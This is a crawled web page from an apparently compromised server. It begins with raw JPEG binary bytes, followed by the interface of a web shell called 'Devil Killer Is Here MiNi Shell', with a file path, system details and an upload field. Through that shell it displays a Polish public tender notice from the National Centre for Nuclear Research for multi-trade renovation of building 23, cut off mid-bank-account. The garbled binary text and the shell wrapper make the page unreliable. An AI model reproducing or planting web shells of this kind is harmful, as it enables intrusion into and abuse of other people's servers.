JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250408/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250408/0018106201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wielobranżowe prace modernizacyjne budynku nr 23 zlokalizowanego na terenie Narodowego Centrum Badań Jądrowych w Otwocku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowe Centrum Badań Jądrowych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001024043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Andrzeja Sołtana 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">222731630</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ncbj.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ncbj.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wielobranżowe prace modernizacyjne budynku nr 23 zlokalizowanego na terenie Narodowego Centrum Badań Jądrowych w Otwocku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2a64e89f-a849-4e30-8889-7bef4252c050</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00181062</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 1. Projekt MNL Maria Neutron Laboratory - Program: Krajowy Plan Odbudowy i Zwiększenia Odporności. 2. Projekt NOMATEN CoRE, Program: Krajowy Plan Odbudowy i Zwiększenia Odporności. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ncbj; www.ncbj.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ncbj; www.ncbj.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w<br/>języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/ncbj<br/>2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia, powinien posiadać konto na Platformie<br/>zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie zakupowej oraz korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.<br/>3. W postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz wszelkich<br/>oświadczeń odbywa się przy użyciu Platformy. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się<br/>datę ich wczytania do Platformy.<br/>4. Dokładne informacje o środkach komunikacji elektronicznej oraz o wymaganiach technicznych i organizacyjnych sporządzania,<br/>wysyłania i odbierania korespondencji elektronicznej zawarte zostały w SWZ -TOM I Rozdział 1, ust. 14</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opis zawarty jest w SWZ - Tom I, Rozdział 1, ust. 25</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opis zawarty jest w SWZ - Tom I, Rozdział 1, ust. 25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EZP.270.19.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie wielobranżowych prac modernizacyjnych w części pomieszczeń budynku nr 23 zlokalizowanego na terenie ośrodka Narodowego Centrum Badań Jądrowych w Otwocku-Świerku. Inwestycja ma na celu przystosowanie istniejących pomieszczeń jako <br/>pomieszczenia laboratoryjne, techniczne i magazynowe dla potrzeb pracowników NCBJ oraz gości wykonujących badania. <br/>6.3. Zakres przedmiotu zamówienia składa się z gwarantowanego przez Zamawiającego przedmiotu zamówienia (zamówienie podstawowe) oraz z zamówienia objętego prawem opcji (zamówienie opcjonalne). Zamawiający zastrzega sobie prawo do skorzystania z prawa opcji.<br/>1. Zakres prac obejmujący zamówienie podstawowe:<br/>1) Wykonanie robót modernizacyjnych w części A piwnicy budynku nr 23 zlokalizowanego na terenie Narodowego Centrum Badan Jądrowych w Otwocku.<br/>2) Wykonanie robót remontowych na potrzeby dostosowania pomieszczeń A37a/A37 dla Laboratorium Analiz Funkcjonalnych w Pracowni Korozji Wysokotemperaturowej,<br/>3) Wykonanie robót remontowych na potrzeby dostosowania pomieszczeń A46/A47 dla Laboratorium Analiz Funkcjonalnych w Pracowni Wieloskalowej Analizy Powierzchni,<br/>2. Zakres prac obejmujmujący zamówienie w ramach prawa opcji<br/>1) Remont kotłowni wraz ze studnią schładzającą w pomieszczeniu B011/B012 w piwnicy części B budynku <br/>nr 23 – prawo opcji<br/>Zamawiający uzależnia skorzystanie z prawa opcji od wartości złożonych ofert przez Wykonawców oraz od posiadania przez niego wystarczających środków finansowych na ten cel. <br/>W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>Warunkiem uruchomienia prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odrębnego zamówienia poza stanowiącym zamówienie podstawowe. <br/>Zamówienie w ramach zakresu zamówienia opcjonalnego Zamawiający może złożyć najpóźniej w terminie do 1 miesiąca od daty zawarcia umowy na realizację zamówienia podstawowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">44112310-4 - Ścianki działowe</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Remont kotłowni wraz ze studnią schładzającą w pomieszczeniu B011/B012 w piwnicy części B budynku <br/>nr 23 – prawo opcji<br/>Zamawiający uzależnia skorzystanie z prawa opcji od wartości złożonych ofert przez Wykonawców oraz <br/>od posiadania przez niego wystarczających środków finansowych na ten cel. <br/>W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne <br/>roszczenia z tego tytułu. <br/>Warunkiem uruchomienia prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w <br/>ramach prawa opcji i złożenie odrębnego zamówienia poza stanowiącym zamówienie podstawowe. <br/>Zamówienie w ramach zakresu zamówienia opcjonalnego Zamawiający może złożyć najpóźniej w <br/>terminie do 1 miesiaca od daty zawarcia umowy na realizację zamówienia podstawowego.<br/>Minimalny wymagany okres gwarancji na przedmiot zamówienia podstawowego oraz zamówienia w <br/>ramach prawa opcji wynosi 36 miesięcy<br/>wartość opcji: 402 788,60 zł <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, tj. polegających na powtórzeniu podobnych prac zgodnych z przedmiotem zamówienia podstawowego o wartości do 50% szacunkowej wartości zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">KRYTERIA OCENY OFERT<br/>21.1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria <br/>oceny ofert:<br/>Cena – 90 % = 90 pkt<br/>Okres gwarancji – 10 % = 10 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) dotyczącej Wykonawcy <br/>a) Warunek zostanie spełniony, jeżeli Wykonawca wykaże się doświadczeniem wykonania w <br/>okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy w tym okresie, co najmniej dwóch robót budowlanych (obejmujących <br/>wykonanie robót ogólnobudowlanych, sanitarnych i elektrycznych) polegających na wykonaniu <br/>budowy lub przebudowy lub remontu obiektu budowlanego o wartości nie mniejszej niż 1 000 <br/>000,00 zł brutto każda<br/>2) dotyczącej osób:<br/>Warunek zostanie spełniony, jeżeli Wykonawca będzie dysponował na etapie realizacji zamówienia <br/>osobami zdolnymi do wykonania zamówienia, które spełniają następujące wymagania:<br/>a) Kierownik robót - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami <br/>budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne <br/>uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów.<br/>b) Kierownik robót - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami <br/>Strona 7 z 37<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń <br/>elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia <br/>budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów.<br/>c) Kierownik robót - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami <br/>budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, <br/>wentylacyjnych, gazowych, wodociągowych lub odpowiadające im ważne uprawnienia <br/>budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej <br/>obowiązujących przepisów.<br/>Zamawiający dopuszcza składanie przez osoby będące obywatelami państw członkowskich Unii <br/>Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o <br/>Wolnym Handlu (EFTA) – strony umowy o Europejskim Obszarze Gospodarczym dokumentów <br/>potwierdzających nabycie kwalifikacji zawodowych do wykonywania działalności w budownictwie, <br/>równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium <br/>Rzeczypospolitej Polskiej wraz z odpowiednią decyzją o uznaniu kwalifikacji zawodowych zgodnie z <br/>przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów <br/>budownictwa.<br/>W przypadku Wykonawców zagranicznych dopuszcza się równoważne kwalifikacje zdobyte w <br/>innych państwach na zasadach określonych w art. 12a ustawy z dnia 7.7.1994 r. - Prawo budowlane <br/>z uwzględnieniem postanowień ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji <br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 r., poz. 65). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa, na wezwanie Zamawiającego o którym mowa w pkt 10.4:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, <br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz <br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, <br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez <br/>podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z <br/>Strona 9 z 37<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie <br/>dokumenty – zgodnie ze wzorem, który stanowi Formularz 3.4.<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w <br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, lub kierowanie <br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, <br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie <br/>do dysponowania tymi osobami – zgodnie ze wzorem, który stanowi Formularz 3.5</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać <br/>za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Oferty <br/>wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, <br/>Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów <br/>udostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności ww. <br/>dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz <br/>Strona 14 z 37<br/>danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski <br/>pobranych samodzielnie przez Zamawiającego dokumentów<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania <br/>Wykonawcy lub podmiotu udostępniającego zasoby chyba, że umocowanie do reprezentacji <br/>wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW; <br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). <br/>Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do <br/>reprezentowania w postępowaniu i zawarcia umowy;<br/>4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z <br/>uwzględnieniem postanowień pkt. 18.3. IDW;<br/>5) zobowiązania wymagane postanowieniami pkt. 11.3. IDW, w przypadku gdy Wykonawca polega <br/>na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków <br/>udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego <br/>zobowiązania nie wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW; <br/>6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa <br/>w art. 117 ust. 4 ustawy Pzp;<br/>7) oświadczenie wymagane postanowieniami pkt. 10.2., 11.9. i 13.3. IDW <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający ustala wadium na całość przedmiotu zamówienia w wysokości 26 000,00 zł (słownie: <br/>dwadzieścia sześć tysięcy złotych).<br/>18.2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących <br/>formach wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru Wykonawcy.<br/>18.3. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje <br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. Wadium takie musi <br/>obejmować cały okres związania ofertą. Treść gwarancji lub poręczenia nie może zawierać <br/>postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu <br/>gwarancyjnego do gwaranta. <br/>Jako Beneficjenta wadium wnoszonego w formie gwarancji lub poręczenia należy wskazać –<br/>„Narodowe Centrum Badań Jądrowych, ul. Andrzeja Sołtana 7, 05-400 Otwock NIP: 532-010-01-<br/>25, REGON 001024043”<br/>W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja <br/>lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez <br/>Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp. <br/>Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie <br/>wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne <br/>żądanie Zamawiającego.<br/>Gwarancja lub poręczenie musi zawierać w swojej treści wskazanie adresu e-mail lub adresu <br/>pocztowego na który Zamawiający prześle oświadczenie o zwolnieniu wadium.<br/>Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność <br/>jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie <br/>nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż <br/>wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim <br/>i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa.<br/>18.4. Wadium w pieniądzu (PLN) należy wnieść najpóźniej przed upływem terminu składania ofert, <br/>przelewem na konto: <br/>Dla wykonawcy krajowego: Nr konta PKO BP XII O/W-wa 95 1020 1026 0000 